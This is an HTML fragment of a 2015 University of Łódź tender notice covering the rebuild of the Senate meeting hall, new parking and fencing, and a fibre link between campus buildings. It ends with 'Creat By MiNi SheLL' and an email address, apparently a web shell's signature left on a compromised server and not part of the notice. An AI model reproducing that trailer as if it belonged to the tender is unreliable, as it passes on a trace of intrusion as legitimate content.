<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 10 i 11 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">7.4.1. Oświadczenia o przynależności do grupy kapitałowej wraz z listą podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5 ustawy lub informację o tym, że nie należy do grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331, z późn. zm.) - załącznik nr 2b do SIWZ. Ilekroć mowa o grupie kapitałowej - rozumie się przez to wszystkich przedsiębiorców, którzy są kontrolowani w sposób bezpośredni lub pośredni przez jednego przedsiębiorcę, w tym również tego przedsiębiorcę.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - gwarancja - 10</li>
</ul>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uni.lodz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Łódzki Biuro Inwestycji i Nieruchomości , 90-131 Łódź, ul. Lindleya 3, II p, pokój 226A,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.01.2015 godzina 10:00, miejsce: Uniwersytet Łódzki Biuro Inwestycji i Nieruchomości , 90-131 Łódź, ul. Lindleya 3, II p, pokój 226A,do dnia 23.01.2015r. do godz. 10:00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przebudowa Sali Posiedzeń Senatu Uniwersytetu Łódzkiego wraz z wykonaniem parkingu i stylowego ogrodzenia przy ul. Narutowicza 65 i Narutowicza 68 w Łodzi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres prac dla Pakietu nr 1 obejmuje 
Zakres prac polega na przebudowie istniejącego  parterowego budynku przylegającego do dawnego Gmachu Szkoły Zgromadzeniu Kupców  mieszczącego  Sale Posiedzeń Senatu Uniwersytetu Łódzkiego  w tym na 
Wykonaniu nowej aranżacji wnętrza Sali Posiedzeń Senatu UŁ i pozostałych pomieszczeń objętych opracowaniem , kompleksowej wymianie  instalacji technicznych niezbędnych do prawidłowego funkcjonowania  obiektu obejmującej wykonanie  projektowanej instalacji elektrycznej , niskoprądowej,  instalacji  wodociągowej  i kanalizacyjnej oraz  instalacji mechanicznej i grawitacyjnej 
Opis budynku
Dane całego obiektu
Powierzchnia netto 262,80m2
Kubatura 2 141,31m3
szer.x dł 22,81 m x 15,81 m
Wysokość budynku 8,47 m
Liczba kondygnacji 1 
Budynek jest wpisany do Rejestru   zabytków nieruchomych woj. łódzkiego pod numerem A 95

SALA POSIEDZEŃ SENATU
Przebudowa istniejącego parterowego budynku na Salę Posiedzeń Senatu UŁ, która obejmuje:
wykonanie nowej aranżacji wnętrza Sali posiedzeń Senatu i pozostałych pomieszczeń objętych opracowaniem;
wykonanie robót konstrukcyjnych: osadzenie nadproży nad otworami drzwiowymi, przesunięcie istniejących podciągów w oś istniejących łuków, wykonanie konstrukcji wsporczych pod obudowy wewnętrzne, wzmocnienie ścian poprzez zazbrojenie rys.
przewidziany dokumentacją remont konstrukcji dachu został już wykonany i nie wchodzi do zakresu przetargu;
kompleksowa wymiana instalacji teletechnicznych niezbędnych do prawidłowego funkcjonowania obiektu obejmująca wykonanie:
instalacji elektrycznej: odgromowej, instalacji oświetlenia (w tym awaryjnego), gniazd elektrycznych, instalacji siły i sterowania dla centrali wentylacyjnej na dachu łącznika;
instalacji niskoprądowej: system sygnalizacji pożaru, system sygnalizacji włamania i napadu, system telewizji przemysłowej, system kontroli dostępu, sieć strukturalna, system Audio, system multimedialny;
instalacja wentylacji montaż kanałów nawiewno-wywiewnych podłączonych do już zamontowanej centrali wentylacyjnej ustawionej na dachu łącznika. 
instalacja wod-kan w pomieszczeniu socjalnym
wyposażenie Sali Senatu i pokoju socjalnego w meble  zgodnie z załącznikiem 8b 
Wykonanie projektu Parkingu i zagospodarowanie  terenu wraz z wykonaniemogrodzenia i wiaty śmietnikowej  przy Rektoracie Uniwersytetu Łódzkiego w Łodzi przy ul. Narutowicza 68  zgodnie z  programem  funkcjonalno użytkowym 

Zakres prac 
1Uzyskanie  decyzji o warunkach zabudowy ( jeżeli będzie wymagane)
2Sporządzenie aktualnej mapy do celów  projektowych 
3Sporządzenie projektu budowlano- wykonawczego  z przedmiarami, kosztorysem  inwestorskim oraz Specyfikacją  techniczną wykonania  i odbioru
4Uzyskanie  prawomocnej decyzji o pozwoleniu na budowę
5Wykonanie wszystkich robót budowlano -instalacyjnych wynikających z opracowanego  projektu parkingu i zagospodarowania  terenu wraz z ogrodzeniem i wiatą śmietnikową
cała konstrukcja stalowa ogrodzenia powinna być zabezpieczona ocynkiem ogniowym

Projekt budowlano - wykonawczy powinien zostać sporządzony na bazie załączonej koncepcji przewidującej łącznie  71  miejsc parkingowych i uwzględnić odwodnienie  i oświetlenie parkingu (12 - toma  lampami na słupach ) Przekroje konstrukcyjne parkingu, dróg  i chodników  należy przyjąć zgodnie z załączonym rysunkiem nr 1 z przekrojami. projekt bud.-wyk powinien być zbieżny z załączonym zestawieniem ilości elementów parkingu.
Projekt bud.-wyk. należy opracować w  4 - ch  egzemplarzach w wersji papierowej  i 1 egz. w wersji  elektronicznej. Przedmiary , kosztorys inwestorski i STWiOR należy opracować  1 egzemplarzach w wersji papierowej i 1 egz. w wersji elektronicznej - Zakres prac należy wycenić w arkuszu kalkulacyjnym  -  Załącznik nr 8A

Wykonanie Parkingu i zagospodarowanie  terenu wraz z wykonaniem ogrodzenia  przy Rektoracie Uniwersytetu Łódzkiego w Łodzi przy ul. Narutowicza 65  obejmuje: 
budowę zjazdu publicznego
 budowę miejsc postojowych dla samochodów osobowych w ilości 52 szt. wraz z alejami dojazdowymi
budowę utwardzeń terenu (ciągów pieszych, jezdnych  na posesji przy ul. Narutowicza 65)
wykonanie rozbiórek istniejących utwardzeń terenu i kolidującego z projektowanym zagospodarowaniem terenu budynku gospodarczego znajdującego się na posesji przy ul. Narutowicza 65
 zagospodarowanie terenów zielonych
budowę ogrodzenia terenu wraz z bramą wjazdową i furtką pieszą - cała konstrukcja gotowa  ogrodzenia powinna być zabezpieczona ocynkiem ogniowy	
budowę instalacji oświetlenia terenu oraz instalację elektryczną zasilania i sterowania szlabanem oraz brama wjazdową
budowę instalacji kanalizacji deszczowej
zabezpieczenie istniejących na terenie sieci, instalacji telekomunikacyjnych 
Zakres prac należy wycenić w arkuszu kalkulacyjnym  -  Załącznik nr 8A
Przedmiary - załącznik nr 5 

Termin Wykonania dokumentacji projektowej w pakiecie  pierwszym i uzyskania pozwolenia na budowę  powinno być dokonane w terminie do  15.05.2015r. całość pakietu termin wykonania do 15.07.2015r..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.44.00-4, 71.22.00.00-6, 71.42.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. gwarancja - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Połączenie  budynków Narutowicza 65 i 68 oraz Uniwersytecka  3/5  do sieci teletechnicznej UŁ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Połączenie  budynków Narutowicza 65 i 68 oraz Uniwersytecka  3/5  do sieci teletechnicznej UŁ zgodnie z załączonymi  przedmiarami załącznik nr 8 a pakiet nr 2 
Jest to podłączenie rezerwowe w relacji Narutowicza 65 - 68 studnia przy budynku Uniwersytecka 3,
połączenia światłowodowe, rezerwowe pomiędzy głowicą Lodman na budynku Rektoratu do pomieszczenia serwerowni  w budynku Narutowicza 68,  kabel częściowo przechodzi kanalizację istniejącą - wymagane jest  rozbudowanie o ok. 91 metrów -; 86 m po terenie UŁ , 5 m po terenie  obcym. Nowo wybudowana  kanalizacja rozłożona będzie w studni istniejącej przy budynku Uniwersyteckiej 3. Początek budowanej kanalizacji teletechnicznej test  w studni na rogu ul. Narutowicza Uniwersytecka  , która jest własnością LODMAN 
Wycena według załączonego   załącznik nr  8a   -   Pakiet nr 2.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.21.44.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. gwaranacja - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com